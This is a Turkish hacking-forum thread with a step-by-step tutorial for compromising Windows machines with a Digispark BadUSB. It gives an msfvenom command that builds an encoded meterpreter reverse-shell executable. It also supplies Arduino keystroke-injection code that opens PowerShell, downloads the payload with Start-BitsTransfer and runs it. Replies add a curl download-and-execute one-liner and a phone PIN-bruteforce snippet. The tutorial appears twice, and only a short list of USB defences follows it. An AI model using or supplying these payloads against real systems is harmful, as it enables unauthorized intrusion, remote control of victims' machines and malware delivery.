Digispark BadUSB ile Cihazlara Sızmak 2024

MorfiNNN

Üye
16 Eyl 2018
64
17
güzel konu attiny kodu her sürüme uyumlu mu ? eline sağlık
Attiny85 için geçerli

verebilirmisiniz rica etsem kodları
Konu olarak paylaşacağım

android cihazlarda önceden cihaz modeli hakkında bilgin yoksa zor.
Hangi harflere basacağını, ekranın neresine tıklayacağını, cihazın ne kadar hızlı indirme yapabileceğini, veya o sırada başka bir pop-up belirip belirmeyeceğini herşeyi kusursuz bir şekilde bilmen gerekiyor. ekran çözünürlüğü, butonların yerleri, hangi tarayıcıyı kullandığına kadar her şey kusursuz ve eksiksiz olarak bilinmeli,

yoksa BadUSB yanlış bir yere tıkladığı anda, veya telefon 2 saniyeliğine donduğu zaman badUSB bunu bilmeyeceği için sağa sola tıklamaya devam eder ve saldırı çöp olur. o yüzden android cihazlarda gerçek dünya senaryolarında geçersiz bir saldırı türü. Ama windows makinelerde kolay, win+r > payload > enter bu kadar.
 
Moderatör tarafında düzenlendi:

Carlonhack

Uzman üye
20 Şub 2022
1,293
324
android cihazlarda önceden cihaz modeli hakkında bilgin yoksa zor.
Hangi harflere basacağını, ekranın neresine tıklayacağını, cihazın ne kadar hızlı indirme yapabileceğini, veya o sırada başka bir pop-up belirip belirmeyeceğini herşeyi kusursuz bir şekilde bilmen gerekiyor. ekran çözünürlüğü, butonların yerleri, hangi tarayıcıyı kullandığına kadar her şey kusursuz ve eksiksiz olarak bilinmeli,

yoksa BadUSB yanlış bir yere tıkladığı anda, veya telefon 2 saniyeliğine donduğu zaman badUSB bunu bilmeyeceği için sağa sola tıklamaya devam eder ve saldırı çöp olur. o yüzden android cihazlarda gerçek dünya senaryolarında geçersiz bir saldırı türü. Ama windows makinelerde kolay, win+r > payload > enter bu kadar.
Valla sen olmazsan ne yapacağız❤
Eyvallah gözüm
 

Nakzos

Yeni üye
12 Kas 2019
16
6
Tam delayların mantıksız olduğunu anlatacaktım alexandre20 yazmış : )

Hedef makina windows veya linux vs olsa dahi karşı tarafın internet hızı işinizi bozabilir
 

alexandre20

Katılımcı Üye
13 Tem 2022
899
701
Tam delayların mantıksız olduğunu anlatacaktım alexandre20 yazmış : )

Hedef makina windows veya linux vs olsa dahi karşı tarafın internet hızı işinizi bozabilir
pek bozmaz, tek satırlık işi var kod yürütmenin. win+r > cmd.exe /c curl site.com/malware.exe --output malware.exe && malware.exe yazarsan indirme bittiği an direkt çalıştırır.
badUSB'nin beklemesine gerek yok. Tek sorun, eğer klavye dili TRQ'dan farklı ise yanlış tuşlara basar o yüzden işe yaramaz, veya win+r bastığında gelen çalıştır penceresinin açılması çok uzun sürerse aynı şekilde
 

Nakzos

Yeni üye
12 Kas 2019
16
6
pek bozmaz, tek satırlık işi var kod yürütmenin. win+r > cmd.exe /c curl site.com/malware.exe --output malware.exe && malware.exe yazarsan indirme bittiği an direkt çalıştırır.
badUSB'nin beklemesine gerek yok. Tek sorun, eğer klavye dili TRQ'dan farklı ise yanlış tuşlara basar o yüzden işe yaramaz, veya win+r bastığında gelen çalıştır penceresinin açılması çok uzun sürerse aynı şekilde


Çok az bir ihtimal fakat yazdığın zararlı exe büyük boyutlu ise (bazı programcılar taramada antivirusleri geçebilmek adına dosya sonuna rastgele hex yazıyor) indirme hızına bağlı olarak karışıklık olabilir.

şimdi bir gigafiber kullanın interneti var birde 5mbps internet kullanan azeri var : ) ama klavye konusunda haklısın. seni sevdim her ihtimali hesaplıyorsun.
 

MorfiNNN

Üye
16 Eyl 2018
64
17
bu resim ile tam olarak neyi kanıtlamaya çalışıyorsun? yazdığım şey hala geçerli. Telefonlarda eğer hedef cihaz hakkında bilgi yoksa badusb yapılamaz.
Bu zaten tüm cihazlar için geçerli değil mi? Normal bir şey yani sadece telefon için geçerli değil.

pek bozmaz, tek satırlık işi var kod yürütmenin. win+r > cmd.exe /c curl site.com/malware.exe --output malware.exe && malware.exe yazarsan indirme bittiği an direkt çalıştırır.
badUSB'nin beklemesine gerek yok. Tek sorun, eğer klavye dili TRQ'dan farklı ise yanlış tuşlara basar o yüzden işe yaramaz, veya win+r bastığında gelen çalıştır penceresinin açılması çok uzun sürerse aynı şekilde
Bir de telefonda şimdilik digisparkla maximum pin bruteforce yapabilirsin onun da kodları şu şekilde:

int num[] = {39, 30, 31, 32, 33, 34, 35, 36, 37, 38};
int a = 0; //1st digit
DigiKeyboard.sendKeyStroke(num[a]);

Zaten digispark telefonun dokunmatiğine erişemez.
Yani çıkarımın yanlış ama güzel mantık.

bu resim ile tam olarak neyi kanıtlamaya çalışıyorsun? yazdığım şey hala geçerli. Telefonlarda eğer hedef cihaz hakkında bilgi yoksa badusb yapılamaz.
Bu fotoğraf da indirme yapmak için vs. lazım olan kablo ve cihaz, bunlarla cihaz açıkken yapabilirsin ama evet hepsinde bir sistem bilgisi edinilmesi gerekiyor. Telefonlarda 3-4 tane işletim sistemi yok.
Bilgisayarda Ubuntu, Windows, MacOS var ama telefonlarda çok fazla işetim sistemi var dediğin doğru ama indirme yapmanı sağlayacak kodları da paylaşacağım
 
Moderatör tarafında düzenlendi:

Carlonhack

Uzman üye
20 Şub 2022
1,293
324
Bir de telefonda şimdilik digisparkla maximum pin bruteforce yapabilirsin onun da kodları şu şekilde:

int num[] = {39, 30, 31, 32, 33, 34, 35, 36, 37, 38};
int a = 0; //1st digit
DigiKeyboard.sendKeyStroke(num[a]);

Zaten digispark telefonun dokunmatiğine erişemez.
Yani çıkarımın yanlış ama güzel mantık.
Nasıl erişemiyor o kadar video attım adam payload yükletiyir
 
15 Mar 2022
82
21
Günümüzde dijital dünyada, güvenlik bir öncelik haline geldi. Ancak, ne yazık ki, teknolojinin ilerlemesiyle birlikte, siber saldırganlar da daha sofistike yöntemler geliştiriyorlar. İşte bu noktada, bilgi güvenliği uzmanlarının, saldırıları tespit etmek ve savunma stratejileri geliştirmek için aynı araçları kullanmaları gerekiyor. Bu noktada, Digispark gibi küçük ancak güçlü cihazlar, siber güvenlik uzmanlarının ve pentest uzmanlarının araç setlerinde önemli bir yer tutuyor.

Şimdi Digispark'ın gücünü keşfetmek için adım adım bir rehber sunacağız. Öncelikle, Metasploit Framework'ün nasıl kurulacağına ve bu güçlü aracın nasıl kullanılacağına odaklanacağız. Ardından, Digispark'ın nasıl kullanılabileceğini ve hedef sistemlere nasıl sızabileceğini göstereceğiz. Son olarak, savunma stratejilerini geliştirmek için bu tür saldırıları nasıl engelleyebileceğimize bir göz atacağız.
Hazırsanız, siber güvenlik dünyasına bir adım atalım ve Digispark ile cihazları nasıl sızabileceğimizi keşfedin.

- MSFVenom -

Öncelikle virüsümüzü oluşturmamız lazım. Bunun için metasploit kullanacağız. Genelde herkeste kurulu gelen bir araç için 0'dan kurulumunu göstermeye gerek olduğunu düşünmüyorum. Zaten Digispark kullanmak bir üst seviye olduğu için buraları öğrenilmiş varsayıyorum.
Öncelikle neler kullanabiliceğimize bakmak için msfvenom -h komutunu kullanıyoruz


  • -p : (Payload) :Oluşturulan zararlı dosya açıldıktan sonra çalışan kod parçası
  • -e : (Encoder) :Oluşturulan zararlı dosyayı antivirüslere yakalanmaması için şifreleyen araç seçiminin yapıldığı parametre
  • -i : (İterations) :Oluşturulan zararlı dosyayı kaç defa şifreyeleceğini seçeceğimiz parametre
  • -b : (Bad Chars) :Oluşturulan zararlı dosyanın çalışabilmesi için çıkaracağımız kötü karakterleri yazdığımız parametre
  • -f : (Format) :Oluşturulan zararlı dosyayı hangi formatta kaydeceğimizi belirlediğimiz parametre
  • -a : (Architecture) :Oluşturulan zararlı dosyanın hangi mimaride çalışacağını verdiğimiz parametre
  • --platform :Oluşturulan zararlı dosyanın hangi işletim sisteminde çalışacağını verdiğimiz parametre

Burda örnek amaçlı normal bir virüs oluşturacağım. Bunun için kullanacağımız komut:

msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor -i 5 -a x64 --platform windows LHOST=192.168.1.1 LPORT=443 -f exe > tht.exe

Şimdi bunu BadUSB'ye taşımaya hazırız. Ama gelin önce Digispark BadUSB'den bahsedelim.

Digispark:

Digispark, bir ATtiny85 mikrodenetleyiciye dayalı olarak geliştirilmiş bir USB geliştirme kartıdır. İnanılmaz derecede küçük boyutuyla dikkat çeker ve USB üzerinden bilgisayarlarla iletişim kurabilir. ATtiny85, Arduino IDE'si ile programlanabilir ve bu sayede Digispark, Arduino kodunu çalıştırabilen küçük bir USB cihazı haline gelir. Digispark, hızlı prototipleme, taşınabilirlik ve düşük maliyet avantajları sağlar. Ayrıca, bu küçük cihaz, USB HID (Human Interface Device) emülatörü olarak da kullanılabilir, böylece klavye, fare gibi cihazlar gibi davranabilir ve bilgisayara veri gönderebilir.

ATtiny85:

ATtiny85, AVR mikrodenetleyiciler ailesinden bir üye olan 8-bit bir mikrodenetleyicidir. 8KB flash bellek, 512 byte SRAM ve 512 byte EEPROM'a sahiptir. Düşük güç tüketimi ve kompakt boyutu, ATtiny85'i portatif ve enerji verimli uygulamalar için ideal hale getirir. Bu mikrodenetleyici, genellikle küçük boyutlu projelerde ve entegre sistemlerde kullanılır ve birçok sensör ve cihazla uyumlu çalışabilir.

BadUSB:

BadUSB, aslında bir güvenlik açığıdır ve bir USB cihazının kötü amaçlı yazılımla programlanıp, normal bir USB aygıtı gibi davranmasını ifade eder. Bu, bir USB cihazının, bilgisayara bağlandığında otomatik olarak kötü amaçlı kodları çalıştırabileceği anlamına gelir. BadUSB saldırıları, genellikle hedef bilgisayarları enfekte etmek, bilgi çalmak veya diğer kötü amaçlı eylemleri gerçekleştirmek için kullanılır.

Digispark, ATtiny85'in esnekliği ve USB iletişim yetenekleri sayesinde BadUSB saldırılarında kullanılabilir. Programlanabilir doğası sayesinde, istenilen kötü amaçlı kodları yürütmek için kullanılabilir. Bu nedenle, Digispark genellikle güvenlik testleri ve sızma testleri sırasında kullanılan bir araçtır.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Virüsümüzü oluşturduğumuza göre bunu aktarmamız lazım. Bunun için de herhangi bir dosya upload sitesine girip indirme butonu linkini kopyalayacağız. Bunun nedeni Digispark'ın indirme butonlarına tıklayamıyor oluşu.


Daha sonra bunu aşağıdaki kodlarda <LINK> olarak belirtilen kısma yapıştırıyoruz.


#include "DigiKeyboard.h"
void setup() {
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(0);
}
void loop() {
int i = 1;
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(200);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("Start-BitsTransfer <LINK>");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(8000);
DigiKeyboard.print("exit");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(250);
while (i == 1) {
DigiKeyboard.print("a.exe");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
i = 2;
}
}




Bu yazıyı gördükten sonra normal şekilde metasploit üzerinden dinlemeye alıyoruz. Usbyi hedef cihaza taktıktan sonra bağlantı gelmiş olucaktır. Peki bu nasıl oluyor?
Küçük cihazımızla virüsümüzü direkt olarak bilgisayarın içine windows powershell üzerinden yükleme yaptık. Bu sayede indirip anında çalıştırdı ve bu yaklaşık 10sn sürüyor.

Bundan korunmanın yolu var mı?

  1. USB Girişlerini Kısıtlama: Bilgisayarınızda USB girişlerini kısıtlamak, bilinmeyen veya güvenilmeyen USB cihazlarının otomatik olarak çalışmasını engelleyebilir. Bu, bilgisayarınızı güvenlik açısından daha korunaklı hale getirebilir.
  2. USB Güvenlik Yazılımları Kullanma: Bazı güvenlik yazılımları, bilgisayarınıza bağlanan USB cihazlarını otomatik olarak tarar ve potansiyel tehditleri tespit eder. Bu tür yazılımları kullanarak, bilgisayarınızı BadUSB saldırılarına karşı koruyabilirsiniz.
  3. Fiziksel Güvenlik Önlemleri: Bilgisayarınızın USB girişlerini fiziksel olarak korumak için, USB portlarına takılabilen veya kapatılabilen koruyucu kapaklar kullanabilirsiniz. Bu, bilgisayarınıza fiziksel erişimi kısıtlayarak, kötü niyetli kişilerin USB cihazlarını kolayca bağlamasını engelleyebilir.
Bu önlemler, Digispark BadUSB saldırılarına karşı korunmanıza yardımcı olabilir. Ancak, her durumda, güvenlik bilinci ve dikkatli davranışlar, en etkili savunma stratejileridir.

İyi forumlar.

Eline sağlık ve teşekkürler.
 

drjacob

Uzman üye
21 Ocak 2012
1,777
405
localhost
Günümüzde dijital dünyada, güvenlik bir öncelik haline geldi. Ancak, ne yazık ki, teknolojinin ilerlemesiyle birlikte, siber saldırganlar da daha sofistike yöntemler geliştiriyorlar. İşte bu noktada, bilgi güvenliği uzmanlarının, saldırıları tespit etmek ve savunma stratejileri geliştirmek için aynı araçları kullanmaları gerekiyor. Bu noktada, Digispark gibi küçük ancak güçlü cihazlar, siber güvenlik uzmanlarının ve pentest uzmanlarının araç setlerinde önemli bir yer tutuyor.

Şimdi Digispark'ın gücünü keşfetmek için adım adım bir rehber sunacağız. Öncelikle, Metasploit Framework'ün nasıl kurulacağına ve bu güçlü aracın nasıl kullanılacağına odaklanacağız. Ardından, Digispark'ın nasıl kullanılabileceğini ve hedef sistemlere nasıl sızabileceğini göstereceğiz. Son olarak, savunma stratejilerini geliştirmek için bu tür saldırıları nasıl engelleyebileceğimize bir göz atacağız.
Hazırsanız, siber güvenlik dünyasına bir adım atalım ve Digispark ile cihazları nasıl sızabileceğimizi keşfedin.

- MSFVenom -

Öncelikle virüsümüzü oluşturmamız lazım. Bunun için metasploit kullanacağız. Genelde herkeste kurulu gelen bir araç için 0'dan kurulumunu göstermeye gerek olduğunu düşünmüyorum. Zaten Digispark kullanmak bir üst seviye olduğu için buraları öğrenilmiş varsayıyorum.
Öncelikle neler kullanabiliceğimize bakmak için msfvenom -h komutunu kullanıyoruz


  • -p : (Payload) :Oluşturulan zararlı dosya açıldıktan sonra çalışan kod parçası
  • -e : (Encoder) :Oluşturulan zararlı dosyayı antivirüslere yakalanmaması için şifreleyen araç seçiminin yapıldığı parametre
  • -i : (İterations) :Oluşturulan zararlı dosyayı kaç defa şifreyeleceğini seçeceğimiz parametre
  • -b : (Bad Chars) :Oluşturulan zararlı dosyanın çalışabilmesi için çıkaracağımız kötü karakterleri yazdığımız parametre
  • -f : (Format) :Oluşturulan zararlı dosyayı hangi formatta kaydeceğimizi belirlediğimiz parametre
  • -a : (Architecture) :Oluşturulan zararlı dosyanın hangi mimaride çalışacağını verdiğimiz parametre
  • --platform :Oluşturulan zararlı dosyanın hangi işletim sisteminde çalışacağını verdiğimiz parametre

Burda örnek amaçlı normal bir virüs oluşturacağım. Bunun için kullanacağımız komut:

msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor -i 5 -a x64 --platform windows LHOST=192.168.1.1 LPORT=443 -f exe > tht.exe

Şimdi bunu BadUSB'ye taşımaya hazırız. Ama gelin önce Digispark BadUSB'den bahsedelim.

Digispark:

Digispark, bir ATtiny85 mikrodenetleyiciye dayalı olarak geliştirilmiş bir USB geliştirme kartıdır. İnanılmaz derecede küçük boyutuyla dikkat çeker ve USB üzerinden bilgisayarlarla iletişim kurabilir. ATtiny85, Arduino IDE'si ile programlanabilir ve bu sayede Digispark, Arduino kodunu çalıştırabilen küçük bir USB cihazı haline gelir. Digispark, hızlı prototipleme, taşınabilirlik ve düşük maliyet avantajları sağlar. Ayrıca, bu küçük cihaz, USB HID (Human Interface Device) emülatörü olarak da kullanılabilir, böylece klavye, fare gibi cihazlar gibi davranabilir ve bilgisayara veri gönderebilir.

ATtiny85:

ATtiny85, AVR mikrodenetleyiciler ailesinden bir üye olan 8-bit bir mikrodenetleyicidir. 8KB flash bellek, 512 byte SRAM ve 512 byte EEPROM'a sahiptir. Düşük güç tüketimi ve kompakt boyutu, ATtiny85'i portatif ve enerji verimli uygulamalar için ideal hale getirir. Bu mikrodenetleyici, genellikle küçük boyutlu projelerde ve entegre sistemlerde kullanılır ve birçok sensör ve cihazla uyumlu çalışabilir.

BadUSB:

BadUSB, aslında bir güvenlik açığıdır ve bir USB cihazının kötü amaçlı yazılımla programlanıp, normal bir USB aygıtı gibi davranmasını ifade eder. Bu, bir USB cihazının, bilgisayara bağlandığında otomatik olarak kötü amaçlı kodları çalıştırabileceği anlamına gelir. BadUSB saldırıları, genellikle hedef bilgisayarları enfekte etmek, bilgi çalmak veya diğer kötü amaçlı eylemleri gerçekleştirmek için kullanılır.

Digispark, ATtiny85'in esnekliği ve USB iletişim yetenekleri sayesinde BadUSB saldırılarında kullanılabilir. Programlanabilir doğası sayesinde, istenilen kötü amaçlı kodları yürütmek için kullanılabilir. Bu nedenle, Digispark genellikle güvenlik testleri ve sızma testleri sırasında kullanılan bir araçtır.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Virüsümüzü oluşturduğumuza göre bunu aktarmamız lazım. Bunun için de herhangi bir dosya upload sitesine girip indirme butonu linkini kopyalayacağız. Bunun nedeni Digispark'ın indirme butonlarına tıklayamıyor oluşu.


Daha sonra bunu aşağıdaki kodlarda <LINK> olarak belirtilen kısma yapıştırıyoruz.


#include "DigiKeyboard.h"
void setup() {
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(0);
}
void loop() {
int i = 1;
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(200);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("Start-BitsTransfer <LINK>");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(8000);
DigiKeyboard.print("exit");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(250);
while (i == 1) {
DigiKeyboard.print("a.exe");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
i = 2;
}
}




Bu yazıyı gördükten sonra normal şekilde metasploit üzerinden dinlemeye alıyoruz. Usbyi hedef cihaza taktıktan sonra bağlantı gelmiş olucaktır. Peki bu nasıl oluyor?
Küçük cihazımızla virüsümüzü direkt olarak bilgisayarın içine windows powershell üzerinden yükleme yaptık. Bu sayede indirip anında çalıştırdı ve bu yaklaşık 10sn sürüyor.

Bundan korunmanın yolu var mı?

  1. USB Girişlerini Kısıtlama: Bilgisayarınızda USB girişlerini kısıtlamak, bilinmeyen veya güvenilmeyen USB cihazlarının otomatik olarak çalışmasını engelleyebilir. Bu, bilgisayarınızı güvenlik açısından daha korunaklı hale getirebilir.
  2. USB Güvenlik Yazılımları Kullanma: Bazı güvenlik yazılımları, bilgisayarınıza bağlanan USB cihazlarını otomatik olarak tarar ve potansiyel tehditleri tespit eder. Bu tür yazılımları kullanarak, bilgisayarınızı BadUSB saldırılarına karşı koruyabilirsiniz.
  3. Fiziksel Güvenlik Önlemleri: Bilgisayarınızın USB girişlerini fiziksel olarak korumak için, USB portlarına takılabilen veya kapatılabilen koruyucu kapaklar kullanabilirsiniz. Bu, bilgisayarınıza fiziksel erişimi kısıtlayarak, kötü niyetli kişilerin USB cihazlarını kolayca bağlamasını engelleyebilir.
Bu önlemler, Digispark BadUSB saldırılarına karşı korunmanıza yardımcı olabilir. Ancak, her durumda, güvenlik bilinci ve dikkatli davranışlar, en etkili savunma stratejileridir.

İyi forumlar.

emeğine sağlık.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.